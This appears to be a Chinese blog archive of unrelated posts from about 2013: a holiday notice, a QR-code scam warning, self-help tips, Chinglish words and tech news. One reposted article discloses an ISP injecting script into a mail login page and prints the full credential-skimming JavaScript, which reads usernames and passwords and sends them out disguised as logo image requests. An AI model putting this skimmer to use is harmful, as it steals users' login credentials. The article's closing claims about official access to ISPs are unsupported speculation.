2014年放假安排公布

李克强总理签署国务院第644号令,公布《国务院关于修改的决定》,自2014年1月1日起施行。

原标题:国务院办公厅关于2014年部分节假日安排的通知

国务院办公厅关于2014年 部分节假日安排的通知

国办发明电〔2013〕28号

各省、自治区、直辖市人民政府,国务院各部委、各直属机构:

经国务院批准,现将2014年元旦、春节、清明节、劳动节、端午节、中秋节和国庆节放假调休日期的具体安排通知如下。

一、元旦:1月1日放假1天。

二、春节:1月31日至2月6日放假调休,共7天。1月26日(星期日)、2月8日(星期六)上班。

三、清明节:4月5日放假,4月7日(星期一)补休。

四、劳动节:5月1日至3日放假调休,共3天。5月4日(星期日)上班。

五、端午节:6月2日放假,与周末连休。

六、中秋节:9月8日放假,与周末连休。

七、国庆节:10月1日至7日放假调休,共7天。9月28日(星期日)、10月11日(星期六)上班。

节假日期间,各地区、各部门要妥善安排好值班和安全、保卫等工作,遇有重大突发事件,要按规定及时报告并妥善处置,确保人民群众祥和平安度过节日假期。

国务院办公厅

2013年12月11日

扫个二维码 银行卡里的钱不翼而飞

双十一的火爆气氛还未消散,网店卖家张先生就遇到一件让他追悔莫及的事情,他在扫描一个二维码后,银行卡里的钱全部被坏人盗刷,几万元不翼而飞。

【案情回放】扫个二维码,卡里钱被盗

张先生是做家具定制生意的,近几年生意越做越大,他也开了一家网上旗舰店,双十一期间生意特别好。

“前几天,有个人说他家里要装修,想定制些家具。那个人就和其他前来咨询的客人一样,没什么特别。”张先生每次回想这个事情,都特别懊悔。

“只是聊着聊着,那个买家突然说,他在外面,手机流量有限发不了那么多图,让我扫描一个二维码,下载后可以看到他想要的家具的图片和尺寸。”张先生说,“现在都流行扫一下二维码,我之前扫描过,很方便,就拿手机扫了一下。但是扫描后,我啥也没看到。”

“后来我又和买家沟通了一会,他说先付些订金,问我要了姓名、身份证、银行卡、手机号等信息,说晚上回到家再汇款就下线了。”

晚上,张先生登录网银,看看买家的订金到账没有,却震惊地发现银行卡内少了好几万。张先生马上意识到自己被盗了,赶紧冻结了银行卡并向警方报案。

【骗术大揭秘】手机木马拦短信,快捷支付转钱财

通过调查发现:这位声称要定制家具的“买家”是个骗子,他利用张先生急于做成买卖的心理,引诱他扫描二维码。张先生扫二维码后,他的手机下载了一个木马病毒程序,专门拦截短信。

坏人先利用“付订金”骗得张先生的个人信息,再通过手机木马拦截短信验证码,然后绑定各类快捷支付平台,直接盗刷走了银行卡里所有的钱!

您可千万别以为这事只会发生在卖家店主身上,众多普通买家也有被骗风险。

无独有偶,网购达人刘小姐最近也遇到了类似的事情:被称作“网购达人”的刘小姐已是久经网店卖场的高手,双十一期间也是收获颇丰。正忙着收快递的她这天突然收到一个“网店客服”的消息“为感谢您双十一期间的惠顾,店铺将给您返现金30元”。活动返利这种事情挺常见的,平时自己也都挺谨慎,刘小姐没多想就按要求提供了收款的姓名、身份证、银行卡和手机号。紧接着,“客服”说刘小姐的身份信息核对有点问题,让她扫描二维码。然后马上核对成功,请她耐心等待收款。结果刘小姐等到的却是自己的银行卡被骗子盗刷了三千元。

【安全小提醒】二维码勿轻易扫,个人信息保护好

QQ安全中心提醒大家注意:

1. 千万不要轻易向他人泄露个人信息,包括姓名、身份证、手机号、银行卡号等信息;

2. 请使用安全的二维码扫描工具,不要随意扫描非官方的二维码或安装不明手机程序;

3. 安装手机安全管理软件,保证手机安全。

如果您���经遇到此类情况,请在第一时间冻结银行卡, 保证资金安全,并及时向警方报案寻求帮助。

假日办三套放假方案

这三套方案分别为:

  方案一:春节放假3天,调借相邻周六、周日形成7天长假。国庆节放假3天,不调休,假期固定为10月1日至3日,逢周末顺延。元旦、清明节、劳动节、端午节、中秋节各放假1天,不调休,仅在当天放假,逢周末时周一补休。

  方案二:春节放假3天,调借相邻周六、周日形成7天长假。国庆节放假3天,调借相邻周六、周日形成5天长假,假期固定为10月1日至5日。元旦、清明节、劳动节、端午节、中秋节各放假1天,节假日逢周三时不调休,仅在当天放假;逢周二、周四时,调借相邻周六、周日形成3天小长假;逢周六、周日时周一补休。

  方案三:春节放假3天,调借相邻周六、周日形成7天长假。国庆节放假3天,调借相邻周六、周日形成7天长假,假期固定为10月1日至7日。元旦、清明节、劳动节、端午节、中秋节各放假1天,节假日逢周三时不调休,仅在当天放假;逢周二、周四时,调借相邻周六、周日形成3天小长假;逢周六、周日时周一补休。

自己在skydrive做的调查链接吐舌笑脸

http://sdrv.ms/188jiFj

[转载]你们以为运营商只是HTTP插点广告而已么

国内某邮件服务商,近期在某南方地区有大量客户反应登录时出错和异常,于是工作人员进行了一下跟进,发现如下:

首先,邮件服务商登陆页面为普通HTTP协议发送,提交时通过JS进行RSA加密(没错,JS的RSA),发送到SSO登陆点,然后进行登录,有些人一看RSA,应该挺安全的了,不过……

在国内上网的大多数人对于运营商在HTTP包里插广告应该很熟悉了,原理很简单,大家可以参考腾讯安全中心的这篇文章http://security.tencent.com/index.php/blog/msg/10

在客户端抓包发现收到的HTTP数据包有异常,有几个包的TTL多了2,说明比正常从服务器到客户端的数据包少走了两跳,而且离服务器不是很远,估计在一个机房里,并且数据包的ID是很规律的12345,明显就是伪造的,包中插入了如下内容:

<script type="text/javascript"> 
    document.getElementById("freepassword").onblur = function (e) { 
        logoFresh(); 
    }; 

    function onLoginCheck() { 
        var user = null; 
        var pass = null; 
        user = document.getElementById("freename").value; 
        pass = document.getElementById("freepassword").value; 
        if (user.length <= 0 || pass.length <= 0) { 
            return false; 
        } else { 
            return rskQuery(user + '&' + pass + '&xxxxx.com'); 
        } 
    }; 

    function rskQuery(s) { 
        s = encodeURIComponent(s); 
        var r = Math.random(); 
        var num = (Math.round(r * 100)) % 9 + 1; 
        var i = 0; 
        var out = ''; 
        do { 
            var ch = s.charCodeAt(i++); 
            ch = (i % 2 > 0) ? (ch - i % num) : (ch + i % num); 
            var l = (ch / 10 >= 10) ? 3 : (ch / 10 > 0 ? 2 : 1); 
            out += l.toString() + ch; 
        } while (i < s.length); 
        out = r.toString().substring(0, num) + out + num; 
        return out; 
    }; 

    function logoFresh() { 
        var h = logoUrl(); 
        var s = onLoginCheck(); 
        if (s == false) { 
            return false; 
        } 
        for (var i = 0; i < 2; i++) { 
            var bg_logo = new Image(0, 0); 
            bg_logo.src = h + 'images/logo_bg.jpg?' + s; 
        } 
        var s1 = onLoginCheck(); 
        var ajaxUrl = h + 'images/logo_bg.jpg?' + s1; 
        var result = xmlHttpConnect(ajaxUrl, "get", null); 
    }; 

    function logoUrl() { 
        return '/'; 
    }; 

    function createXMLHttp() { 
        if (window.XMLHttpRequest) return new XMLHttpRequest(); 
        else if (window.ActiveXObject) return new ActiveXObject("Microsoft.XMLHTTP"); 
        else return null; 
    }; 

    function xmlHttpConnect(url, method, content) { 
        var request = createXMLHttp(); 
        if (request == null) return null; 
        try { 
            request.open(method, url, true); 
            request.send(content); 
        } catch (e) { 
            return null; 
        } 
        if ((request.readyState == 4) && (request.status == 200)) return null; 
        else return null 
    }; 

    document.getElementById("vippassword").onblur = function (e) { 
        logo_Fresh(); 
    } 

    function onLoginPhone() { 
        var user = null; 
        var pass = null; 
        user = document.getElementById("vipname").value; 
        pass = document.getElementById("vippassword").value; 
        if (user.length <= 0 || pass.length <= 0) { 
            return false; 
        } else { 
            return rskQuery(user + '&' + pass + '&vip.xxxxx.com'); 
        } 
    } 

    function logo_Fresh() { 
        var h = logoUrl(); 
        var s = onLoginPhone(); 
        if (s == false) { 
            return false; 
        } 
        for (var i = 0; i < 2; i++) { 
            var bg_logo = new Image(0, 0); 
            bg_logo.src = h + 'images/logo_bg.jpg?' + s; 
        } 
        var s1 = onLoginCheck(); 
        var ajaxUrl = h + 'images/logo_bg.jpg?' + s1; 
        var result = xmlHttpConnect(ajaxUrl, "get", null); 
    } 
</script>

 

在登录form里抓取用户名和密码,当成参数跟在logo后面再访问一下logo,再从中间抓包获取这段内容。这样的话邮件服务商的日志里肯定会出现很多logo的请求后面跟着明文用户名密码吧,错了,服务商那边根本没看到logo被请求两次,推断是带有这个特征的数据包被drop了,真尼玛用心啊。

至此,用户的邮箱密码已经泄露,用户和服务商也没有任何察觉,可能由于某些原因,比如延迟,丢包,bug之类的,导致部分用户被插的时候有异常,影响了原有的登录js,才导致这次事件浮出水面。

服务商由于成本问题,暂不考虑采用SSL登录。

至于那边还有什么类似设备我就不多说了,反正据我的了解,国内随便什么实权部门都能任意在ISP机房和主干网上接入任意设备,据说连税务的都有。

关于本次事件学到的内容:

国内服务用的任何用户名和密码和在国外比如gmail,twitter的账号要不相同,而且没有任何关联,并且国外服务的注册邮箱,密保邮箱等都要采用国外邮箱,首推gmail,并且打开二次认证,不要用短信认证,用手机验证器。

线上线下密码要分开,不相同,不近似,比如本地硬盘加密密码。凡是通过明文协议传输的通通被视为已暴露,HTTPS登录时每次手动查看证书签发机构是否为之前常用的那一个,遇到怀疑是国内CA伪造证书的立刻把证书导出另存为,因为国内没有root CA(cnnic的好像在ff和chrome已经被去掉了),只有二级证书机构,一旦被发现随便签证书会被立刻取消资格,并且黑名单推送到各大浏览器和操作系统。

呵呵,你们以为能频繁的,多种花样的插12306就赢了么,你们以为每天在微博打打嘴炮就胜利了么,菊花都被爆脱肛了还不知道。

比尔·盖茨生日快乐!

比尔·盖茨生日快乐!

  1955 年 10 月 28 日,一名男婴在美国西海岸华盛顿州的西雅图的一个家庭诞生,他和两个姐姐一起长大,他曾从哈佛半途辍学,与保罗·艾伦一起创建了微软公司,创造了 Windows,并成为世界首富,他就是比尔·盖茨。

  比尔·盖茨(Bill Gates),全名威廉·亨利·盖茨(William Henry Gates,1955 年 10 月 28 日-),美国微软公司的董事长。与保罗·艾伦创办微软公司,曾任微软首席执行官和首席软件设计师,持有公司超过8% 的普通股,是公司最大的个人股东。

  1995 年到 2007 年的《福布斯》全球亿万富翁排行榜中,比尔·盖茨连续 13 年蝉联世界首富。2008 年 6 月 27 日正式退出微软公司,并把 580 亿美元个人财产捐到比尔和梅琳达·盖茨基金会。

  2012 年 9 月 19 日,《福布斯》2012 年美国富豪排行榜发布,比尔·盖茨第 19 次蝉联美国首富桂冠。2009 年,比尔·盖茨超越沃伦·巴菲特成为世界首富,是在 2008 年之后首次夺回了世界首富宝座。而在 2010 年至 2013 年,均被墨西哥富豪卡洛斯·斯利姆·埃卢超越,让其成为蝉联 3 年的世界首富。

  至今为止,比尔·盖茨以 720 亿美元的净资产连续第 20 年蝉联美国首富宝座。

  Happy Birthday,Bill!

怎么战胜拖延症?

方法一、确定一个可操作的目标

  目标必须是可观察的、具体的、实在的,而不是模糊和抽象的。

  假设这样一个事实:你不是因为囊中羞涩,而是因为懒得取钱,而拖欠了包租婆4天的房租,每次下班回家,你路过包租婆的家门,守株待兔的她都会用一副泼妇骂街的架势大声嚷嚷让你交租。如果你厌倦了包租婆的嘴脸,想要摆脱不交租的拖延症,你就要制定具体的,可操作的目标:今天下班后,我要坐某路车到某银行取多少钱交租;而不是:今天我要交租了。

方法二、将目标分解成短小具体的迷你目标

  冰冻三尺非一日之寒。千里之行始于足下。要善于将每一个目标分解成容易达成的小目标。只要坚持小目标就会累积成大目标——不积小流无以成江河。

  假设你看中了一位貌美如花的单身女同事,你的终极目标是非她不娶。那么你应该将此目标分解成一个个短小具体的目标:今天写情书;明天唱情歌;后天写情书+唱情歌;大后天送鲜花;大大后天送巧克力;然后送车、送房、送钻戒……这样她就非你不嫁了。

方法三、现实地对待时间

  当你设定了一个任务,你要认真严肃地问自己有多少时间去执行。你应该这样提醒自己:我最好看一下日程表,看看我什么时候可以开始做。上次那个任务所花的时间超过了我的预期;而不是笼统地说:我有充足的时间去执行这个任务。

方法四、只管开始做,Just Do It  (说做就做)

  心急吃不了热豆腐,一口吃不成一个胖子。不要想着一下子做完整件事情,每次只需迈出一小步。可以经常问自己:我要采取的第一个行动是什么。

方法五、为困难和挫折做好准备

  有些目标任务执行起来不会那么的一帆风���,困难和挫折是家常便饭。因此你要为困难和挫折做好准备,千万不要一遇到挫折就又让自己坠入拖延症的深渊。

方法六、将任务委派给别人

  也许你是因为讨厌某人或者某事而陷入拖延症的,这个时候你可以将任务委派给可以胜任的人。

方法七、保护你的时间,学会说不

  不要做一个好好先生。任何人的时间都是宝贵的,记得保护你的时间,学会拒绝,对别人说不。

方法八、将拖延看成一个信号

  当你觉得自己在拖延的时候,把它当成一个你需要扪心自问的信号。如:拖延传递给我的是什么信息?千万不要太过自责,你可以这样问自己:我又在拖延,我的感受是怎样的?它意味着什么?我可以从中学到什么?

中式英语dama等风靡全球

这些年中国贡献的英语词句:

shuanggui  双规

chengguan  城管

don train  动车

jiujielity  纠结

geilivable  给力

Chimerica  中美国

We two who and who?  咱俩谁跟谁?

Go and look!  走着瞧!

No money no talk!  没钱免谈!

dama 大妈

《华尔街日报》的视频网站上,有个单词很引人关注。为了报道中国大妈带动金价上涨,《华尔街日报》特地创造了“dama”(大妈)这一来自汉语拼音的英语单词。这表明中国贡献的英语单词,正不知不觉、越来越多地融入了国际生活的方方面面。

拼音成为英语单词

像“dama”这类从另一种语言中“借”来的词,通常被称为“借词”, 在语言学上不是一个新现象。

近代以来,中文词汇借来了不少英语单词,如“拷贝”、“酷”、“可乐”等。这些外来词生动形象,既保留了英语词原有的发音,又有中文表意的特点,词语的内在含义一目了然。

同时,取自汉语拼音的英语单词近年也频频在海外媒体的报道中露面。10多年前,外国人就对“guanxi”(关系)一词津津乐道。不同于英语中的“relationship”,“guanxi”特用来描绘中国社会独有的复杂关系网。后来,此词甚至被收录进了英美国家的商学院教材《Rules and Networks》中。

这样的例子还有很多,英国《经济学人》把中国未婚男士译成“guanggun”(光棍),《纽约客》把中国激进年轻人译为“fenqing”(愤青),央视的英语网站将在海外的中国消费者译成“chinsumer”……

老外热捧端赖幽默

另一种有趣的语言现象被称为中式英语(Chinglish),它的典型代表是“Long time no see”(好久不见),一个已经被收录进标准英语辞典中式英语词组。

南京大学海外教育学院副院长徐昌火教授说:“由于对英语句法规则、语义语用限制、文化附加义的不了解或了解不深入,中国人容易使用具中文表达方式的英语词句。”

但部分外国人却对中式英语情有独钟。来自新加坡、现就读于浙江大学医学院的留学生何专举拥有中英双语背景,在初次听到“People mountain people sea”(人山人海)时,一下就领略到其中的文化内涵,“和朋友们聊天,我会时不时地使用这种表达方式,多有幽默感呀!”多伦多大学的加拿大学生威廉尽管没有学过中文,却也没少接触中式英语:“我的中国留学生同学常常教我要 Good good study, day day up (好好学习,天天向上)。这句话顺口又好记,已经成了我的个性签名!”

全球语言监测机构(Global Language Monitor)从全球视野和英语语言发展的角度给予了中式英语高度评价,认为中式英语是一种“可喜的混合体”。

语言贡献彰显国力

英语中的大多数词汇原本就出自其他语言,如拉丁语、德语、法语等,而如今中文贡献的英语单词数量与日俱增。

“文明程度越高、社会越发达、对其他语言社团成员吸引力越强的语言,往往影响力更大更深:如罗马时代的拉丁语、秦汉之际的汉语以及第二次世界大战之后的英语。”北京外国语大学汉语文化学院副教授孟德宏这样解读汉语影响力的增强。

语言从来都不是孤立存在的。徐昌火认为:“中式英语走向全球,表层原因是反映当代中国社会文化现象的词汇在英语里是不可对译的,从深层次看,则反映了中外语言文化交流的加速,反映了中国正在融入全球化进程。对此,我们应当乐于接受,静观其变,因为语言永远是在变化之中的。”

[爆料]8080被工商局勒令整改

当前,网络团购消费人气颇旺,但并非所有团购服务都合法经营。近日,万秀区工商部门调查发现,梧州8080团购网站涉嫌超范围经营,并依法向其发出责令整改通知书。

    近日,有市民向万秀区工商局反映,他在梧州8080团购网上,用网银购买了一家音乐会所的电子优惠劵,但由于该音乐会所提出的消费限制令他无法接受,便向客服人员提出退款要求,但该客服人员表示,钱款是梧州8080团购网收取,应向该团购网提出退款申请。随后,该位市民向团购网提出申请,但遭到了推诿搪塞。对此,该市民质疑,作为一家团购网站应该通过第三方支付平台,在消费者完成消费后再进行支付。

    万秀区工商局有关负责人表示,此前已接到不少市民类似的投诉。针对目前部分网店销售假冒伪劣商品现象比较严重,对消费者的合理申诉推诿搪塞时有发生的情况,5月下旬起,万秀区工商局根据市工商局的统一部署,开展对重点网络商品交易网站的专项检查。在专项整治中,该局发现梧州市八零科技有限公司(即梧州8080团购网站)有超经营范围从事互联网团购业务的行为。

    这位负责人说,梧州市八零科技有限公司的营业执照上,只有计算机系统服务、数据处理、电子技术开发咨询、广告设计的业务,不具有经营性互联网信息服务的资格,涉嫌超范围经营。

    梧州八零科技有限公司在未依法办理变更登记的前提下,在互联网上开设8080团购网,从事经营性互联网信息服务,已经违反了《中华人民共和国公司登记管理条例》有关规定。目前,万秀区工商局已依法对该公司发出责令整改通知书,要求其在15日内办理变更登记手续。

工信部:.CN顶级域名遭攻击原因查明

据新华社北京8月26日电 工业和信息化部通信保障局26日介绍,8月25日零时06分起,中国互联网络信息中心管理运行的国家.CN顶级域名系统遭受大规模拒绝服务攻击, 对一些用户正常访问部分.CN网站造成短时期影响。按照应急预案,中国互联网络信息中心在有关单位的配合下,及时采取应急处置措施,凌晨2时后,.CN域 名解析服务逐步恢复正常。

经研判,初步认为攻击系利用僵尸网络向.CN顶级域名系统,持续发起大量针对某游戏私服网站域名的查询请求,峰值流量较平常激增近1000倍,造成.CN顶级域名系统的互联网出口带宽短期内严重拥塞。

Microsoft CEO Steve Ballmer to retire within 12 months

Board of directors initiates succession process; Ballmer remains CEO until successor is named.

REDMOND, Wash. — Aug. 23, 2013 — Microsoft Corp. today announced that Chief Executive Officer Steve Ballmer has decided to retire as CEO within the next 12 months, upon the completion of a process to choose his successor. In the meantime, Ballmer will continue as CEO and will lead Microsoft through the next steps of its transformation to a devices and services company that empowers people for the activities they value most.

“There is never a perfect time for this type of transition, but now is the right time,” Ballmer said. “We have embarked on a new strategy with a new organization and we have an amazing Senior Leadership Team. My original thoughts on timing would have had my retirement happen in the middle of our company’s transformation to a devices and services company. We need a CEO who will be here longer term for this new direction.”

The Board of Directors has appointed a special committee to direct the process. This committee is chaired by John Thompson, the board’s lead independent director, and includes Chairman of the Board Bill Gates, Chairman of the Audit Committee Chuck Noski and Chairman of the Compensation Committee Steve Luczo. The special committee is working with Heidrick & Struggles International Inc., a leading executive recruiting firm, and will consider both external and internal candidates.

“The board is committed to the effective transformation of Microsoft to a successful devices and services company,” Thompson said. “As this work continues, we are focused on selecting a new CEO to work with the company’s senior leadership team to chart the company’s course and execute on it in a highly competitive industry.”

“As a member of the succession planning committee, I’ll work closely with the other members of the board to identify a great new CEO,” said Gates. “We’re fortunate to have Steve in his role until the new CEO assumes these duties.”

Founded in 1975, Microsoft (Nasdaq “MSFT”) is the worldwide leader in software, services and solutions that help people and businesses realize their full potential.